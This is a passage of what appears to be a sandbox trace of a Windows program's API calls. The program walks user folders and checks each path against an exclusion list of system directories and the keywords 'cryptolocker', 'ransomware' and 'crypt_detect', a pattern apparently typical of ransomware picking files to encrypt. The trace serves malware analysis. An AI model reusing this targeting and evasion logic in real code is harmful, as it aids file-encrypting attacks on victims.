(lpFirst="C:\\Users\\Default\\Videos", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.831] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="C:\\Program Files") returned 0x0 [0089.831] GetProcessHeap () returned 0xe30000 [0089.831] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b0) returned 0xec65a0 [0089.831] StrCpyNW (in: psz1=0xec65a0, psz2="C:\\Users\\Default\\Videos", cchMax=1072 | out: psz1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0089.831] StrNCatW (in: psz1="C:\\Users\\Default\\Videos", psz2="\\*", cchMax=1072 | out: psz1="C:\\Users\\Default\\Videos\\*") returned="C:\\Users\\Default\\Videos\\*" [0089.831] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Videos\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec25f0 [0089.831] StrCmpW (psz1=".", psz2=".") returned 0 [0089.831] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.831] StrCmpW (psz1="..", psz2=".") returned 1 [0089.831] StrCmpW (psz1="..", psz2="..") returned 0 [0089.831] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0089.831] FindClose (in: hFindFile=0xec25f0 | out: hFindFile=0xec25f0) returned 1 [0089.831] GetProcessHeap () returned 0xe30000 [0089.831] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec65a0 | out: hHeap=0xe30000) returned 1 [0089.831] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0089.831] FindClose (in: hFindFile=0xec26f0 | out: hFindFile=0xec26f0) returned 1 [0089.831] GetProcessHeap () returned 0xe30000 [0089.831] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec50e8 | out: hHeap=0xe30000) returned 1 [0089.831] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd7b844b1, ftCreationTime.dwHighDateTime=0x1d2a02f, ftLastAccessTime.dwLowDateTime=0xd7b844b1, ftLastAccessTime.dwHighDateTime=0x1d2a02f, ftLastWriteTime.dwLowDateTime=0xd7b844b1, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0089.832] StrCmpW (psz1="Default User", psz2=".") returned 1 [0089.832] StrCmpW (psz1="Default User", psz2="..") returned 1 [0089.832] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc40864ff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default.migrated", cAlternateFileName="DEFAUL~1.MIG")) returned 1 [0089.832] StrCmpW (psz1="Default.migrated", psz2=".") returned 1 [0089.832] StrCmpW (psz1="Default.migrated", psz2="..") returned 1 [0089.832] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0089.832] StrNCatW (in: psz1="C:\\Users", psz2="\\", cchMax=1042 | out: psz1="C:\\Users\\") returned="C:\\Users\\" [0089.832] StrNCatW (in: psz1="C:\\Users\\", psz2="Default.migrated", cchMax=1042 | out: psz1="C:\\Users\\Default.migrated") returned="C:\\Users\\Default.migrated" [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\windows\\system32\\") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\windows\\system\\") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\appdata\\local\\") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\boot\\") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\perflogs\\") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\programdata\\") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\drivers\\") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\wsus\\") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="crypt_detect") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="cryptolocker") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="ransomware") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="C:\\WINDOWS") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.832] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="C:\\Program Files") returned 0x0 [0089.832] GetProcessHeap () returned 0xe30000 [0089.832] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xec50e8 [0089.832] StrCpyNW (in: psz1=0xec50e8, psz2="C:\\Users\\Default.migrated", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated") returned="C:\\Users\\Default.migrated" [0089.833] StrNCatW (in: psz1="C:\\Users\\Default.migrated", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\*") returned="C:\\Users\\Default.migrated\\*" [0089.833] FindFirstFileW (in: lpFileName="C:\\Users\\Default.migrated\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc40864ff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2730 [0089.833] StrCmpW (psz1=".", psz2=".") returned 0 [0089.833] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc40864ff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.833] StrCmpW (psz1="..", psz2=".") returned 1 [0089.833] StrCmpW (psz1="..", psz2="..") returned 0 [0089.833] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7205420a, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0089.833] StrCmpW (psz1="AppData", psz2=".") returned 1 [0089.833] StrCmpW (psz1="AppData", psz2="..") returned 1 [0089.833] StrCpyNW (in: psz1=0xec50e8, psz2="C:\\Users\\Default.migrated", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated") returned="C:\\Users\\Default.migrated" [0089.833] StrNCatW (in: psz1="C:\\Users\\Default.migrated", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\") returned="C:\\Users\\Default.migrated\\" [0089.833] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\", psz2="AppData", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\AppData") returned="C:\\Users\\Default.migrated\\AppData" [0089.833] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\windows\\system32\\") returned 0x0 [0089.833] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.833] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\windows\\system\\") returned 0x0 [0089.833] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.833] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.833] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\appdata\\local\\") returned 0x0 [0089.833] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.833] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.833] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.833] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\boot\\") returned 0x0 [0089.833] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\perflogs\\") returned 0x0 [0089.833] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\programdata\\") returned 0x0 [0089.833] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\drivers\\") returned 0x0 [0089.833] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\wsus\\") returned 0x0 [0089.833] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.833] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.834] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="crypt_detect") returned 0x0 [0089.834] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="cryptolocker") returned 0x0 [0089.834] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="ransomware") returned 0x0 [0089.834] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="C:\\WINDOWS") returned 0x0 [0089.834] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.834] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="C:\\Program Files") returned 0x0 [0089.834] GetProcessHeap () returned 0xe30000 [0089.834] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c4) returned 0xec65b0 [0089.834] StrCpyNW (in: psz1=0xec65b0, psz2="C:\\Users\\Default.migrated\\AppData", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData") returned="C:\\Users\\Default.migrated\\AppData" [0089.834] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData", psz2="\\*", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData\\*") returned="C:\\Users\\Default.migrated\\AppData\\*" [0089.834] FindFirstFileW (in: lpFileName="C:\\Users\\Default.migrated\\AppData\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7205420a, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0089.834] StrCmpW (psz1=".", psz2=".") returned 0 [0089.834] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7205420a, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.834] StrCmpW (psz1="..", psz2=".") returned 1 [0089.834] StrCmpW (psz1="..", psz2="..") returned 0 [0089.834] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0089.834] StrCmpW (psz1="Local", psz2=".") returned 1 [0089.834] StrCmpW (psz1="Local", psz2="..") returned 1 [0089.834] StrCpyNW (in: psz1=0xec65b0, psz2="C:\\Users\\Default.migrated\\AppData", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData") returned="C:\\Users\\Default.migrated\\AppData" [0089.834] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData\\") returned="C:\\Users\\Default.migrated\\AppData\\" [0089.834] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData\\", psz2="Local", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local") returned="C:\\Users\\Default.migrated\\AppData\\Local" [0089.834] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\windows\\system32\\") returned 0x0 [0089.834] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.834] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\windows\\system\\") returned 0x0 [0089.834] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.834] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.834] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\appdata\\local\\") returned 0x0 [0089.834] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.834] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.834] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.835] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\boot\\") returned 0x0 [0089.835] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\perflogs\\") returned 0x0 [0089.835] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\programdata\\") returned 0x0 [0089.835] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\drivers\\") returned 0x0 [0089.835] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\wsus\\") returned 0x0 [0089.835] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.835] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.835] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="crypt_detect") returned 0x0 [0089.835] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="cryptolocker") returned 0x0 [0089.835] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="ransomware") returned 0x0 [0089.835] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="C:\\WINDOWS") returned 0x0 [0089.835] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.835] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="C:\\Program Files") returned 0x0 [0089.835] GetProcessHeap () returned 0xe30000 [0089.835] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d0) returned 0xec7a88 [0089.835] StrCpyNW (in: psz1=0xec7a88, psz2="C:\\Users\\Default.migrated\\AppData\\Local", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local") returned="C:\\Users\\Default.migrated\\AppData\\Local" [0089.835] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData\\Local", psz2="\\*", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local\\*") returned="C:\\Users\\Default.migrated\\AppData\\Local\\*" [0089.835] FindFirstFileW (in: lpFileName="C:\\Users\\Default.migrated\\AppData\\Local\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec25f0 [0089.836] StrCmpW (psz1=".", psz2=".") returned 0 [0089.836] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.836] StrCmpW (psz1="..", psz2=".") returned 1 [0089.836] StrCmpW (psz1="..", psz2="..") returned 0 [0089.836] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0089.836] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0089.836] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0089.836] StrCpyNW (in: psz1=0xec7a88, psz2="C:\\Users\\Default.migrated\\AppData\\Local", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local") returned="C:\\Users\\Default.migrated\\AppData\\Local" [0089.836] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData\\Local", psz2="\\", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local\\") returned="C:\\Users\\Default.migrated\\AppData\\Local\\" [0089.836] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData\\Local\\", psz2="Microsoft", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft") returned="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft" [0089.836] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\windows\\system32\\") returned 0x0 [0089.836] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.836] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\windows\\system\\") returned 0x0 [0089.836] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.836] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.836] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Microsoft" [0089.836] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0089.836] FindClose (in: hFindFile=0xec25f0 | out: hFindFile=0xec25f0) returned 1 [0089.836] GetProcessHeap () returned 0xe30000 [0089.837] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7a88 | out: hHeap=0xe30000) returned 1 [0089.837] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0089.837] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0089.837] GetProcessHeap () returned 0xe30000 [0089.837] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec65b0 | out: hHeap=0xe30000) returned 1 [0089.837] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4204fb0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5636bd87, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0089.837] StrCmpW (psz1="Documents", psz2=".") returned 1 [0089.837] StrCmpW (psz1="Documents", psz2="..") returned 1 [0089.837] StrCpyNW (in: psz1=0xec50e8, psz2="C:\\Users\\Default.migrated", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated") returned="C:\\Users\\Default.migrated" [0089.837] StrNCatW (in: psz1="C:\\Users\\Default.migrated", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\") returned="C:\\Users\\Default.migrated\\" [0089.837] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\", psz2="Documents", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\Documents") returned="C:\\Users\\Default.migrated\\Documents" [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\windows\\system32\\") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\windows\\system\\") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\appdata\\local\\") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", 